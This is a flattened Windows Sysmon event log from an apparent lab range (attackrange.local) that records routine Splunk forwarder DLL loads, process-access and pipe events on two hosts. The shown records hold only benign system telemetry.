CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75EtrueMicrosoft WindowsValid 734700x800000000000000057350720Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.953{8B6011A9-5BBF-618E-68F3-04000000F101}6312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=8AAF6E1B14B9210052FFF90E25926D63,SHA256=F2120C8E63EA94F8618B31319A534731C16D8FDD58B0E1E70217D72A39D78353trueMicrosoft WindowsValid 734700x800000000000000057350719Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.953{8B6011A9-5BBF-618E-68F3-04000000F101}6312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\combase.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=878EBD02A580FDF8F187100127E6D3A8,SHA256=54E4BADDFBD97CFFF871B6D7316B28872218B92F37C41199F71EB37BC5634216trueMicrosoft WindowsValid 734700x800000000000000057350718Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.953{8B6011A9-5BBF-618E-68F3-04000000F101}6312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=9D82D7DBC3D9E0D8E86D10A5B1BF736E,SHA256=270CA1A42ECB4C22E826C1C95924F0014CC99254AB55B7167DA144D45E238E6DtrueMicrosoft WindowsValid 734700x800000000000000057350717Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.953{8B6011A9-5BBF-618E-68F3-04000000F101}6312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft WindowsValid 734700x800000000000000057350716Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.953{8B6011A9-5BBF-618E-68F3-04000000F101}6312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x800000000000000057350715Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.953{8B6011A9-5BBF-618E-68F3-04000000F101}6312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x800000000000000057350714Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.953{8B6011A9-5BBF-618E-68F3-04000000F101}6312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x800000000000000057350713Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.953{8B6011A9-5BBF-618E-68F3-04000000F101}6312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54trueMicrosoft WindowsValid 734700x800000000000000057350712Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.953{8B6011A9-5BBF-618E-68F3-04000000F101}6312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x800000000000000057350711Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.953{8B6011A9-5BBF-618E-68F3-04000000F101}6312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9trueMicrosoft CorporationValid 734700x800000000000000057350710Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.953{8B6011A9-5BBF-618E-68F3-04000000F101}6312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x800000000000000057350709Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.953{8B6011A9-5BBF-618E-68F3-04000000F101}6312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=98978F08A7A0D24C92FE8DC5287A8258,SHA256=CBB940A38E834C0BE44884C667863F76D6700D564043F90B3EB813370C3174E7trueSplunk, Inc.Valid 734700x800000000000000057350708Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.953{8B6011A9-5BBF-618E-68F3-04000000F101}6312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000057350707Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.953{8B6011A9-5BBF-618E-68F3-04000000F101}6312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=6445BD4247E3956B244772F3C415585F,SHA256=2B08FC9E160AD0F698226DA3E30A12551E8EBCCA1E7287E3915EC62B58151A78trueSplunk, Inc.Valid 734700x800000000000000057350706Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.953{8B6011A9-5BBF-618E-68F3-04000000F101}6312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=F30BB43EC30BE50400780223450492CD,SHA256=867D0453E285A5C29A4EFA039D2399662DCCAC98F88C46B0A41CEFB6B68DD836trueSplunk, Inc.Valid 734700x800000000000000057350705Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.953{8B6011A9-5BBF-618E-68F3-04000000F101}6312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=D98BAB348C28C8CFCC11EDB575E2557A,SHA256=ADA3F1256B175ECC390F126D2730D7A1AAB5A53F1AF205A7667D8010416602F9trueSplunk, Inc.Valid 734700x800000000000000057350704Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.953{8B6011A9-5BBF-618E-68F3-04000000F101}6312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x800000000000000057350703Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.953{8B6011A9-5BBF-618E-68F3-04000000F101}6312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=B20FA07A7A61791EE537B5945429E141,SHA256=EF53BC2AB58BC548EFA249B0B8F2E1FBB9D4739EF27B0C67DFF1468D555329D3trueSplunk, Inc.Valid 734700x800000000000000057350702Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.953{8B6011A9-5BBF-618E-68F3-04000000F101}6312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=B8D3119CE62331C6A9B170DA0A608F28,SHA256=7D6C6B7C542B4E67AA468FEB12044E2EE34CE8F8A68C7665D7861F3363B6E66AtrueSplunk, Inc.Valid 734700x800000000000000057350701Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.953{8B6011A9-5BBF-618E-68F3-04000000F101}6312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x800000000000000057350700Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.953{8B6011A9-5BBF-618E-68F3-04000000F101}6312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x800000000000000057350699Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.953{8B6011A9-5BBF-618E-68F3-04000000F101}6312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438trueMicrosoft WindowsValid 734700x800000000000000057350698Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.953{8B6011A9-5BBF-618E-68F3-04000000F101}6312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.9libxml2 librarylibxml2-libxml2.dllMD5=0E7B7B3B25A2F094EB3A7BAF471154B8,SHA256=6CFAC8D8D5B7345F2C6CC82CBF8F9DD475881EA260346BE283E52B822F2CCAC1trueSplunk, Inc.Valid 734700x800000000000000057350697Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.937{8B6011A9-5BBF-618E-68F3-04000000F101}6312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\fltLib.dll10.0.14393.0 (rs1_release.160715-1616)Filter LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationfilterLib.dllMD5=051ABD8360BDA63A1BC77C662FBF0A25,SHA256=C914E2DBAEC2C9A11923A984B30A979637D3A27B3C29E93F4C90FB1D9FBC518FtrueMicrosoft WindowsValid 734700x800000000000000057350696Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.937{8B6011A9-5BBF-618E-68F3-04000000F101}6312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A8CDCAC5C32D14ED8AADDF5489FC5D55,SHA256=140F07A8F6780DAFE20CC4FBE86C9332FB2F0C26ED8F49914BD05265C63EF6F1trueMicrosoft WindowsValid 10341000x800000000000000057350695Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.937{8B6011A9-BB8B-618B-50A0-04000000F101}92124768C:\Windows\system32\conhost.exe{8B6011A9-5BBF-618E-68F3-04000000F101}6312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057350694Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.937{8B6011A9-5BBF-618E-68F3-04000000F101}6312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000057350693Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.937{8B6011A9-5BBF-618E-68F3-04000000F101}6312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000057350692Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.937{8B6011A9-5BBF-618E-68F3-04000000F101}6312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 734700x800000000000000057350691Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.937{8B6011A9-5BBF-618E-68F3-04000000F101}6312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exeMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3trueSplunk, Inc.Valid 10341000x800000000000000057350690Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.937{8B6011A9-8868-6164-0500-00000000F101}424520C:\Windows\system32\csrss.exe{8B6011A9-5BBF-618E-68F3-04000000F101}6312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000057350689Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.937{8B6011A9-BB8A-618B-4CA0-04000000F101}74521152C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{8B6011A9-5BBF-618E-68F3-04000000F101}6312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000057350688Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.932{8B6011A9-5BBF-618E-68F3-04000000F101}6312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{8B6011A9-886B-6164-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3{8B6011A9-BB8A-618B-4CA0-04000000F101}7452C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 18141800x800000000000000057350687Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:19:11.931{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057350686Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:19:11.931{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x800000000000000057350685Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:19:11.931{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057350684Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:19:11.931{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x800000000000000057350683Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:19:11.931{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057350682Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:19:11.931{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 11241100x800000000000000057350681Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.569{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057350680Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.569{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=730F2EAC7AF824F13DC790295B52B7ED,SHA256=D49CD8CAF25B8A7812F7E3B83258F053837FA22DA016EA2692C02ACDE82A0724falsetrue 10341000x800000000000000021219951Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:11.581{AD5E2759-54C7-6143-AA00-00000000F101}35682904C:\Windows\system32\conhost.exe{AD5E2759-5BBF-618E-1CCE-08000000F101}4320C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219950Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:11.581{AD5E2759-5433-6143-0C00-00000000F101}7325560C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219949Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:11.581{AD5E2759-5433-6143-0C00-00000000F101}7325560C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219948Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:11.581{AD5E2759-5433-6143-0C00-00000000F101}7325560C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219947Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:11.581{AD5E2759-5433-6143-0C00-00000000F101}7325560C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219946Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:11.581{AD5E2759-5432-6143-0500-00000000F101}412428C:\Windows\system32\csrss.exe{AD5E2759-5BBF-618E-1CCE-08000000F101}4320C:\Program 